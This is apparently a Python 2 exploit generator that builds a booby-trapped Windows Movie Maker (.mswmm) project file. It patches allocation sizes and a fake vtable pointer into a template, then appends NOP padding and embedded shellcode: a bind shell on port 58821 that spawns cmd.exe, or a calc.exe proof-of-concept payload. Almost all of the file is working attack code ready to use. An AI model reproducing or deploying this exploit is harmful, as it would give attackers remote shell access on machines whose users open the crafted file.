import sys
import os

Target = sys.argv[1]
Port = int(sys.argv[2])
ShellcodeType = sys.argv[3]

def main():

    try:
        rpath = 'exploits/code/data/src.mswmm'
        fdR = open(rpath, 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:9976]
        str2 = strTotal[9980:10104]
        str3 = strTotal[10108:16496]
       	str4 = strTotal[17620:]		
        size_first_new = "\x20\x00\x00\x00" # size of first new()
        size_second_new = "\x11\x11\x00\x00" # size of second new()		
        p2p = "\x71\xb5\x06\x77" # vtable fake pointer from resource section COMRes -8 to jmp EBX 
		
        # Shellcode port 58821
        remoteshell=("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
        "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
        "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
        "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
        "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
        "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
        "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
        "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
        "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
        "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
        "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
        "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
        "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31" +
        "\xdb\x53\x68\x02\x00\xe5\xc5\x89\xe6\x6a\x10\x56\x57\x68" +
        "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff" +
        "\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7" +
        "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
        "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" +
        "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56" +
        "\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86" +
        "\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60" +
        "\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5" +
        "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f" +
        "\x6a\x00\x53\xff\xd5")
		
        # Exec calc.exe
        executecode=("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
        "\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
        "\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
        "\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
        "\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
        "\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
        "\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
        "\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
        "\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
        "\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
        "\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
        "\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
        "\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
        "\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
        "\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
        "\x51\x6b\x28")

        if ShellcodeType == "R":
       	  Shellcode=remoteshell
        if ShellcodeType == "E":
          Shellcode=executecode
        if ShellcodeType == "C":
          Shellcode=executecode
        if ShellcodeType == "L":
          Shellcode=executecode	
			
        if len(Shellcode) > 1120:
          print "[*] Error : Shellcode length is long"
          return
        if len(Shellcode) <= 1120:
          dif = 1120- len(Shellcode)
          while dif > 0 :
            Shellcode += '\x90'
            dif = dif - 1
        path = 'exploits/code/output/exploit.mswmm'
        print "HOLA"	
        fdW = open(path,mode='wb')		
        fdW.write(str1)
        fdW.write(size_first_new)
        fdW.write(str2)
        fdW.write(size_second_new)
        fdW.write(str3)
        fdW.write(p2p)
        fdW.write('\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90')     # padding		
        fdW.write(Shellcode)
        fdW.write(str4)		
        fdW.close()
        fdR.close()
    except IOError as (errno, strerror):
        print "I/O error({0}): {1}".format(errno, strerror)
    except ValueError:
        print "Could not convert data to an integer."
    except:
        print "Unexpected error:", sys.exc_info()[0]
        raise
if __name__ == '__main__':
    main()
